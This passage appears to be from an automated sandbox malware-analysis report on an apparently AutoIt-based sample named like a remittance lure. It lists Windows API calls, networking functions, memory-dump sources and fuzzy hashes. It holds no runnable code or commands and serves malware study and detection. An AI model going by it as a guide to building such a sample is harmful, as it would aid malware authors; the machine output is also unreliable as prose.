                                                                      • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002,?,000000EC,00000000,?,000000EC,?,00000001), ref: 0047A321
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: Window$Long$AttributesLayered
                                                                      • String ID:
                                                                      • API String ID: 2169480361-0
                                                                      • Opcode ID: 53dc7990cfeb01f65bcc542d15cac6368a2c86d5c8ae23ecc65d9f578e391a7a
                                                                      • Instruction ID: 4b457c036b32d13d4d6aa44b7b333d7b15c6210fa1ac615a770d46c951a2b689
                                                                      • Opcode Fuzzy Hash: 53dc7990cfeb01f65bcc542d15cac6368a2c86d5c8ae23ecc65d9f578e391a7a
                                                                      • Instruction Fuzzy Hash: E321C3322045146BD310AB19EC45F9BB798EF81334F20862BF859E72D1C779A855C7AC
                                                                      APIs
                                                                        • Part of subcall function 00434C09: lstrlenW.KERNEL32(?), ref: 00434C1C
                                                                        • Part of subcall function 00434C09: lstrcpyW.KERNEL32(00000000,?), ref: 00434C44
                                                                        • Part of subcall function 00434C09: lstrcmpiW.KERNEL32(00000000,00000000), ref: 00434C78
                                                                      • lstrlenW.KERNEL32(?), ref: 00434CF6
                                                                        • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                      • lstrcpyW.KERNEL32(00000000,?), ref: 00434D1E
                                                                      • lstrcmpiW.KERNEL32(00000002,cdecl), ref: 00434D64
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: lstrcmpilstrcpylstrlen$_malloc
                                                                      • String ID: cdecl
                                                                      • API String ID: 3850814276-3896280584
                                                                      • Opcode ID: c1d0e3fd88ced86f6f3832065c3908be80ab03c979ff4d6bcf24e5a7885ffd19
                                                                      • Instruction ID: b4b7f9d7485e9dcc41445171e378d0673d7e4b3d8a31a27b28546bfa00bfc119
                                                                      • Opcode Fuzzy Hash: c1d0e3fd88ced86f6f3832065c3908be80ab03c979ff4d6bcf24e5a7885ffd19
                                                                      • Instruction Fuzzy Hash: 1521D276200301ABD710AF25DC45AEBB3A9FF99354F10583FF90687250EB39E945C7A9
                                                                      APIs
                                                                        • Part of subcall function 0045F645: WideCharToMultiByte.KERNEL32(00000000,00000000,5004C483,D29EE858,00000000,00000000,00000000,00000000,?,?,?,00467B75,?,00473BB8,00473BB8,?), ref: 0045F661
                                                                      • gethostbyname.WSOCK32(?,00000000,?,?), ref: 0046D42D
                                                                      • WSAGetLastError.WSOCK32(00000000), ref: 0046D439
                                                                      • _memmove.LIBCMT ref: 0046D475
                                                                      • inet_ntoa.WSOCK32(?), ref: 0046D481
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: ByteCharErrorLastMultiWide_memmovegethostbynameinet_ntoa
                                                                      • String ID:
                                                                      • API String ID: 2502553879-0
APIs
• SendMessageW.USER32 ref: 00448C69
• GetWindowLongW.USER32(?,000000EC), ref: 00448C91
• SendMessageW.USER32(?,0000104C,00000000,?), ref: 00448CCA
• SendMessageW.USER32(?,0000102B,00000000,?), ref: 00448D13
Similarity
• API ID: MessageSend$LongWindow
• String ID:
• API String ID: 312131281-0
APIs
• select.WSOCK32(00000000,?,00000000,00000000,?), ref: 00458ABD
• __WSAFDIsSet.WSOCK32(00000000,00000001), ref: 00458ACF
• accept.WSOCK32(00000000,00000000,00000000), ref: 00458ADE
• WSAGetLastError.WSOCK32(00000000), ref: 00458B03
Similarity
• API ID: ErrorLastacceptselect
• String ID:
• API String ID: 385091864-0
APIs
• SendMessageW.USER32(?,000000B0,?,?), ref: 004368C2
• SendMessageW.USER32(?,000000C9,?,00000000), ref: 004368D5
• SendMessageW.USER32(?,000000C9,?,00000000), ref: 004368EC
• SendMessageW.USER32(?,000000C9,?,00000000), ref: 00436904
Similarity
• API ID: MessageSend
• String ID:
• API String ID: 3850602802-0
APIs
• CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00400000,00000000), ref: 00430242
• GetStockObject.GDI32(00000011), ref: 00430258
• SendMessageW.USER32(00000000,00000030,00000000), ref: 00430262
• ShowWindow.USER32(00000000,00000000), ref: 0043027D
Similarity
• API ID: Window$CreateMessageObjectSendShowStock
• String ID:
• API String ID: 1358664141-0
APIs
• GetCurrentThreadId.KERNEL32 ref: 00443CA6
• MessageBoxW.USER32(?,?,?,?), ref: 00443CDC
• WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00443CF2
• CloseHandle.KERNEL32(00000000), ref: 00443CF9
Similarity
• API ID: CloseCurrentHandleMessageObjectSingleThreadWait
• String ID:
• API String ID: 2880819207-0
APIs
• GetWindowRect.USER32(?,?), ref: 00430BA2
• ScreenToClient.USER32(?,?), ref: 00430BC1
• ScreenToClient.USER32(?,?), ref: 00430BE2
• InvalidateRect.USER32(?,?,?,?,?), ref: 00430BFB
Similarity
• API ID: ClientRectScreen$InvalidateWindow
• String ID:
• API String ID: 357397906-0
APIs
• __wsplitpath.LIBCMT ref: 0043392E
  • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
• __wsplitpath.LIBCMT ref: 00433950
• __wcsicoll.LIBCMT ref: 00433974
• __wcsicoll.LIBCMT ref: 0043398A
Similarity
• API ID: __wcsicoll__wsplitpath$__wsplitpath_helper
• String ID:
• API String ID: 1187119602-0
APIs
Similarity
• API ID: _wcslen$_malloc_wcscat_wcscpy
• String ID:
• API String ID: 1597257046-0
APIs
• GetEnvironmentStringsW.KERNEL32(00000000,00416513), ref: 0041F587
• __malloc_crt.LIBCMT ref: 0041F5B6
• FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0041F5C3
Similarity
• API ID: EnvironmentStrings$Free__malloc_crt
• String ID:
• API String ID: 237123855-0
APIs
                                                                      Similarity
                                                                      • API ID: DeleteDestroyObject$IconWindow
                                                                      • String ID:
                                                                      • API String ID: 3349847261-0
                                                                      • Opcode ID: 7c154be5abaa40db753a7e31a7690d619ba9064fd0fbdb090dba25900d6c1ce3
                                                                      • Instruction ID: b40ecd1d224a0eee13877c21127d2214a34fa415f2bf64fab3c1d23e87691ec4
                                                                      • Opcode Fuzzy Hash: 7c154be5abaa40db753a7e31a7690d619ba9064fd0fbdb090dba25900d6c1ce3
                                                                      • Instruction Fuzzy Hash: 60F03C74200601DBC720EF66EDD892B77ACEF49762B00452AFD01D7256D738DC49CB69
                                                                      APIs
                                                                      • EnterCriticalSection.KERNEL32(?), ref: 0044B5F5
                                                                      • InterlockedExchange.KERNEL32(?,?), ref: 0044B603
                                                                      • LeaveCriticalSection.KERNEL32(?), ref: 0044B61A
                                                                      • LeaveCriticalSection.KERNEL32(?), ref: 0044B62C
                                                                      Similarity
                                                                      • API ID: CriticalSection$Leave$EnterExchangeInterlocked
                                                                      • String ID:
                                                                      • API String ID: 2223660684-0
                                                                      • Opcode ID: f874c154f8023f3ba0c2945d1949571bb5db8163ed48ea6956c7f1527a392a8b
                                                                      • Instruction ID: 403f3527bf09fa8cde02bf077099102ce48e3ba47acdf7e4c6f4aa39df9fcef1
                                                                      • Opcode Fuzzy Hash: f874c154f8023f3ba0c2945d1949571bb5db8163ed48ea6956c7f1527a392a8b
                                                                      • Instruction Fuzzy Hash: 78F05E36241104AF96145F59FD488EBB3ACEBE96317005A3FE5418361087A6E845CBB5
                                                                      APIs
                                                                        • Part of subcall function 0044719B: DeleteObject.GDI32(00000000), ref: 004471D8
                                                                        • Part of subcall function 0044719B: ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
                                                                        • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447228
                                                                        • Part of subcall function 0044719B: BeginPath.GDI32(?), ref: 0044723D
                                                                        • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447266
                                                                      • MoveToEx.GDI32(?,?,?,00000000), ref: 00447317
                                                                      • LineTo.GDI32(?,?,?), ref: 00447326
                                                                      • EndPath.GDI32(?), ref: 00447336
                                                                      • StrokePath.GDI32(?), ref: 00447344
                                                                      Similarity
                                                                      • API ID: ObjectPath$Select$BeginCreateDeleteLineMoveStroke
                                                                      • String ID:
                                                                      • API String ID: 2783949968-0
                                                                      • Opcode ID: 4ed419099ee229fcfe9d8e0d6407f17218ff084d459cc4b150d2894610f6bb04
                                                                      • Instruction ID: af9b10de2b5e1f20f757a647655db97b0f5a8bbb123370319d9b3a4020b10ea9
                                                                      • Opcode Fuzzy Hash: 4ed419099ee229fcfe9d8e0d6407f17218ff084d459cc4b150d2894610f6bb04
                                                                      • Instruction Fuzzy Hash: EBF06770105258BBE721AF54ED4EFAF3B9CAB06310F108119FE01622D1C7B86A02CBA9
                                                                      APIs
                                                                      • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00436489
                                                                      • GetWindowThreadProcessId.USER32(?,00000000), ref: 0043649C
                                                                      • GetCurrentThreadId.KERNEL32 ref: 004364A3
                                                                      • AttachThreadInput.USER32(00000000), ref: 004364AA
                                                                      Similarity
                                                                      • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                                      • String ID:
                                                                      • API String ID: 2710830443-0
                                                                      • Opcode ID: 1738b650cb43453f600e53b83a6833ccb1a076b1e6f33d9371cddf7c9876f8ab
                                                                      • Instruction ID: 8dfc3faa83ebd232c18032ab1719f084f6ac8c8028b438e2b3a9de4cfe148046
                                                                      • Opcode Fuzzy Hash: 1738b650cb43453f600e53b83a6833ccb1a076b1e6f33d9371cddf7c9876f8ab
                                                                      • Instruction Fuzzy Hash: 61F06D7168470477EB209BA09D0EFDF379CAB18B11F10C41ABB04BA0C0C6F8B50087AD
                                                                      APIs
                                                                      • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00436C38
                                                                      • UnloadUserProfile.USERENV(?,?,?,000000FF), ref: 00436C46
                                                                      • CloseHandle.KERNEL32(?,?,000000FF), ref: 00436C56
                                                                      • CloseHandle.KERNEL32(?,?,000000FF), ref: 00436C5B
                                                                        • Part of subcall function 00436BA9: GetProcessHeap.KERNEL32(00000000,?), ref: 00436BB6
                                                                        • Part of subcall function 00436BA9: HeapFree.KERNEL32(00000000), ref: 00436BBD
                                                                      Similarity
                                                                      • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                                      • String ID:
                                                                      • API String ID: 146765662-0
                                                                      • Opcode ID: b977b2fe1054b7dcb1d3ac6099765c2a2cefd6419b68de81ef4d64d3a5db7b42
                                                                      • Instruction ID: 8fc8aea04bb3fa9100768a89291620bc24087d812574934f99790ad9b639e1d9
                                                                      • Opcode Fuzzy Hash: b977b2fe1054b7dcb1d3ac6099765c2a2cefd6419b68de81ef4d64d3a5db7b42
                                                                      • Instruction Fuzzy Hash: D9E0C97A510215ABC720EBA6DC48C5BB7ACEF99330311892EFD9683750DA74F840CFA4
                                                                      APIs
                                                                      • GetDesktopWindow.USER32 ref: 00472B63
                                                                      • GetDC.USER32(00000000), ref: 00472B6C
                                                                      • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00472B78
                                                                      • ReleaseDC.USER32(00000000,?), ref: 00472B99
                                                                      Similarity
                                                                      • API ID: CapsDesktopDeviceReleaseWindow
                                                                      • String ID:
                                                                      • API String ID: 2889604237-0
                                                                      • Opcode ID: 25b4e9c05087b9933bd86976477b7eaa0c4512bf79646aedece74daf711fda7f
                                                                      • Instruction ID: 759e45c534ddacfdadb557a06d932f9b55f62470d77a370046d272fbe6975a9a
                                                                      • Opcode Fuzzy Hash: 25b4e9c05087b9933bd86976477b7eaa0c4512bf79646aedece74daf711fda7f
                                                                      • Instruction Fuzzy Hash: BFF03071900205AFDB00EFB5DA4DA5DB7F4FB44315B10887EFD05D7251EAB59900DB54
                                                                      APIs
                                                                      • GetDesktopWindow.USER32 ref: 00472BB2
                                                                      • GetDC.USER32(00000000), ref: 00472BBB
                                                                      • GetDeviceCaps.GDI32(00000000,00000074), ref: 00472BC7
                                                                      • ReleaseDC.USER32(00000000,?), ref: 00472BE8
                                                                      Similarity
                                                                      • API ID: CapsDesktopDeviceReleaseWindow
                                                                      • String ID:
                                                                      • API String ID: 2889604237-0
                                                                      • Opcode ID: cc3434de2b8b5abc20458b04240aea2a6e15dc869db4e5eb232345cc1bf11604
                                                                      • Instruction ID: 439663e17c05eb9dd95bc161916493026628bcc8c78d0f5787bb5213a8e6c1b3
                                                                      • Opcode Fuzzy Hash: cc3434de2b8b5abc20458b04240aea2a6e15dc869db4e5eb232345cc1bf11604
                                                                      • Instruction Fuzzy Hash: FAF03075900205AFCB00EFB5DA8856DB7F4FB84315B10887EFD05D7250DB7999019B94
                                                                      APIs
                                                                      • __getptd_noexit.LIBCMT ref: 00415150
                                                                        • Part of subcall function 004179F0: GetLastError.KERNEL32(?,?,00417F7C,00413644,?,?,004115F6,?,00401BAC,?,?,?), ref: 004179F4
                                                                        • Part of subcall function 004179F0: ___set_flsgetvalue.LIBCMT ref: 00417A02
                                                                        • Part of subcall function 004179F0: __calloc_crt.LIBCMT ref: 00417A16
                                                                        • Part of subcall function 004179F0: GetCurrentThreadId.KERNEL32 ref: 00417A46
                                                                        • Part of subcall function 004179F0: SetLastError.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 00417A5E
                                                                      • CloseHandle.KERNEL32(?,?,0041519B), ref: 00415164
                                                                      • __freeptd.LIBCMT ref: 0041516B
                                                                      • ExitThread.KERNEL32 ref: 00415173
                                                                      Similarity
                                                                      • API ID: ErrorLastThread$CloseCurrentExitHandle___set_flsgetvalue__calloc_crt__freeptd__getptd_noexit
                                                                      • String ID:
                                                                      • API String ID: 1454798553-0
                                                                      • Opcode ID: 061228abfcaf70d0abda61f2bc5ea784a59968e7eaac298a3a03e2daddecc56e
                                                                      • Instruction ID: f82a1693998e09e6351869d5e4a2ded823041337c12103c56f11d560ed0c89ab
                                                                      • Opcode Fuzzy Hash: 061228abfcaf70d0abda61f2bc5ea784a59968e7eaac298a3a03e2daddecc56e
                                                                      • Instruction Fuzzy Hash: BCD0A732805E10A7C122273D5C0DBDF26655F40735B140B09FC25872D1CBACDDC143AC
                                                                      APIs
                                                                      Strings
                                                                      Similarity
                                                                      • API ID: _strncmp
                                                                      • String ID: Q\E
                                                                      • API String ID: 909875538-2189900498
                                                                      • Opcode ID: 065ac9b34865f8fc92d580161c5db786cff1d7033ea8ce1a4bef46ec8c054806
                                                                      • Instruction ID: ec78d02982e52cebfc3c5ce94050df53d12509a5c8006a296af1ac46f88178f7
                                                                      • Opcode Fuzzy Hash: 065ac9b34865f8fc92d580161c5db786cff1d7033ea8ce1a4bef46ec8c054806
                                                                      • Instruction Fuzzy Hash: 34C1A070A04279ABDF318E58A4507ABBBB5AF59310FE441BFD8D493341D2784D8ACB89
                                                                      APIs
                                                                      • OleSetContainedObject.OLE32(00000000,00000001), ref: 00460F3E
                                                                        • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                        • Part of subcall function 00445660: OleSetContainedObject.OLE32(?,00000000), ref: 004456DD
                                                                        • Part of subcall function 00451B42: GetLastError.KERNEL32(?,?,00000000), ref: 00451BA0
                                                                        • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451BF8
                                                                        • Part of subcall function 00451B42: VariantCopy.OLEAUT32(-00000068,?), ref: 00451C0E
                                                                        • Part of subcall function 00451B42: VariantCopy.OLEAUT32(-00000088,?), ref: 00451C27
                                                                        • Part of subcall function 00451B42: VariantClear.OLEAUT32(-00000058), ref: 00451CA1
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: Variant$Copy$ContainedObject$ClearErrorLast_malloc
                                                                      • String ID: AutoIt3GUI$Container
                                                                      • API String ID: 2652923123-3941886329
                                                                      • Opcode ID: 662e4c56437cfc6d97a34dfd7b47562ea5a254ee8eeedf1ae9933f7f1d1523bc
                                                                      • Instruction ID: 68a0a4eee7c61d0b7a6187be62517e39d581686f9474de6139c94a20f06104f0
                                                                      • Opcode Fuzzy Hash: 662e4c56437cfc6d97a34dfd7b47562ea5a254ee8eeedf1ae9933f7f1d1523bc
                                                                      • Instruction Fuzzy Hash: 68A15D746006059FDB10DF69C881B6BB7E4FF88704F24896AEA09CB351EB75E841CB65
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: _memmove_strncmp
                                                                      • String ID: U$\
                                                                      • API String ID: 2666721431-100911408
                                                                      • Opcode ID: a4fdddafd13fd2658ce45903ac35fff56edfd8920f85f030d52c4513684e2ed7
                                                                      • Instruction ID: d3eef72359a6f1828d14317ef8b56b8bfbdd52bf5bc7584d89ae5f72f5b530e1
                                                                      • Opcode Fuzzy Hash: a4fdddafd13fd2658ce45903ac35fff56edfd8920f85f030d52c4513684e2ed7
                                                                      • Instruction Fuzzy Hash: 13718F70E00245CFEF24CFA9C9906AEFBF2AF99304F24826ED445A7345D778A946CB15
                                                                      APIs
                                                                        • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                                                                        • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                                                                      • __wcsnicmp.LIBCMT ref: 00467288
                                                                      • WNetUseConnectionW.MPR(00000000,?,00000000,?,00000000,?,00000000,?), ref: 0046732E
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: Connection__wcsnicmp_wcscpy_wcslen
                                                                      • String ID: LPT
                                                                      • API String ID: 3035604524-1350329615
                                                                      • Opcode ID: d6ee32a1e65a10be59cd2aee46927f2afb98f966929ec107a83db754813dcd00
                                                                      • Instruction ID: cd88b7ab87c5f5a0ce5478f82160e7cdfa8c7cefd9f65e810a8a3337a25aa570
                                                                      • Opcode Fuzzy Hash: d6ee32a1e65a10be59cd2aee46927f2afb98f966929ec107a83db754813dcd00
                                                                      • Instruction Fuzzy Hash: FB51E675A04204ABDB10DF54CC81FAFB7B5AB84708F10855EF905AB381E778EE85CB99
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: _memmove
                                                                      • String ID: \$h
                                                                      • API String ID: 4104443479-677774858
                                                                      • Opcode ID: a8076df7cf2e4be12816d18a067c44a6d5606508540493043604d0ea2b9ab827
                                                                      • Instruction ID: de34c7bb2fe7d28e42aef252d9636822906cf09101983ade98a7172327fa6e04
                                                                      • Opcode Fuzzy Hash: a8076df7cf2e4be12816d18a067c44a6d5606508540493043604d0ea2b9ab827
                                                                      • Instruction Fuzzy Hash: F551A370E002098FDF18CFA9C980AAEB7F2BFC9304F28826AD405AB345D7389D45CB55
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: _memcmp
                                                                      • String ID: &
                                                                      • API String ID: 2931989736-1010288
                                                                      • Opcode ID: a81d5415846f9cf6a42c700ef8b5aeadd08d018be41d214ef7d3fe054b701e0f
                                                                      • Instruction ID: 5cd53615f07abd051f481cac668b43ae4088e938354b3ed51608dfeeaf990cc9
                                                                      • Opcode Fuzzy Hash: a81d5415846f9cf6a42c700ef8b5aeadd08d018be41d214ef7d3fe054b701e0f
                                                                      • Instruction Fuzzy Hash: EC517BB1A0011A9FDB18CF95D891ABFB7B5FF88300F14915AE815A7344D278AE42CBA4
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: _memmove
                                                                      • String ID: \
                                                                      • API String ID: 4104443479-2967466578
                                                                      • Opcode ID: 59d63d8f709c00c8b633315d640480ed85dcad38184220530ca382b626518ab4
                                                                      • Instruction ID: e0e732097d18f8f10327b86eac3a97b4532b2e4be511d275227a7a0ca48fbcca
                                                                      • Opcode Fuzzy Hash: 59d63d8f709c00c8b633315d640480ed85dcad38184220530ca382b626518ab4
                                                                      • Instruction Fuzzy Hash: 2451C570E002498FEF24CFA9C8902AEFBB2BF95314F28826BD45597385D7395D86CB45
                                                                      APIs
                                                                      • _wcslen.LIBCMT ref: 00466825
                                                                      • InternetCrackUrlW.WININET(?,00000000,?), ref: 0046682F
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmp
